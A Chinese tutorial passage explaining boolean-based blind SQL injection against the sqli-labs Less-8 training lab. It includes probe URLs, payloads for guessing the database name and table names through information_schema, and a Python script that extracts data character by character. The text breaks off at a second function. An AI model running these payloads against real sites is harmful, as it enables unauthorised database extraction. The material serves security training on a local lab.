没有合适的资源?快使用搜索试试~ 我知道了~
首页SQL注入之基于布尔的盲注详解
资源详情
资源评论
资源推荐

SQL注入之基于布尔的盲注详解注入之基于布尔的盲注详解
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注
和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
基于布尔的盲注基于布尔的盲注
Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。
由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的
Python代码。
本次的示例就是Less-8。
通过进行下面的语句的注入测试
http://localhost/sqlilabs/Less-8/?id=2'
http://localhost/sqlilabs/Less-8/?id=2"
http://localhost/sqlilabs/Less-8/?id=2\
进行测试的时候,只有在id=2'的时候页面无法显示内容。输入的语句如果符合要求,页面就会显示内容,但是显示的内容都是一样的。这种情况下页面上的
输出对于我们来说是完全没有用的,包括SQL执行出错的信息都不会在页面上显示。这种情况下之前的通过执行SQL语句然后在页面上显示SQL执行之后返
回的信息完全是不可能的啦。这种情况下就是一个典型的SQL盲注了。
我们通过页面是否显示内容来判断我们的SQL语句是否正确,进而猜解数据库的信息。
通过上面的注入测试,我们知道后台的SQL的注入语句的写法是:
select field from table where id='userinput'
id参数是被单引号包括的。其他的信息我们就无法得到了。
得到数据库的名称得到数据库的名称
在得到数据库的名称之前,首先需要得到数据库的长度
http://localhost/sqlilabs/Less-8/?id=2' and length(database())>1 %23
http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23
以此类推
.....
发现当值为8的时候,页面就没有显示。那么说明database()的长度是8。
得到了datbase()的长度之后,接下来就是得到database()的名称了。
这个时候就不能完全靠手注了,必须编写Python代码来完成。其中最主要就是进行大量的注入测试来判断程序执行正确和出错的时机,然后断定当前的值
可能就是正确的值。
下面就是一个简单的使用Python来进行布尔盲注获取数据的代码。
def get_db_name():
result = ""
url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
for i in range(1,9):
for char in chars:
char_ascii = ord(char)
url = url_template.format(i,char_ascii)
response = requests.get(url)
length = len(response.text)
#返回的长度只有706和722
if length>706:
result += char
break
print(result)
得到最后的结果的是security,是正确的。
得到数据库中的表信息得到数据库中的表信息
其实所有的SQL注入步骤都是类似的。首先得到数据库的名称(这一步不是必须的),然后得到当前数据库的表名称,然后得到表的字段,最后进行脱裤。这
个步骤在前一章已经有说明了。
首先看一个简单的SQL盲注获取数据库表信息的写法。
http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23
其实还是使用之前的select table_name from information_schema.tables where table_schema=database() limit 0,1 这样的语句来得到表的信息,但是现在是无法在页面上显
示的,而是通过盲注来一个字符一个字符的获取表名。
接下也同样是通过编写Python代码来获取表名了。代码也和上面的类似。主要就是修改中的URl。在进行Python获取表名之前,我们同样需要知道表名的长
度。
使用如下的语句就可以得到了。
获取表名的SQL注入的写法就是如下
http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
通过这种方式我们知道数据库表中的第一个表名的长度是6。知道了表名的长度之后,接下来的Python脚本就很好写了。
def get_table_name():

















安全验证
文档复制为VIP权益,开通VIP直接复制

评论0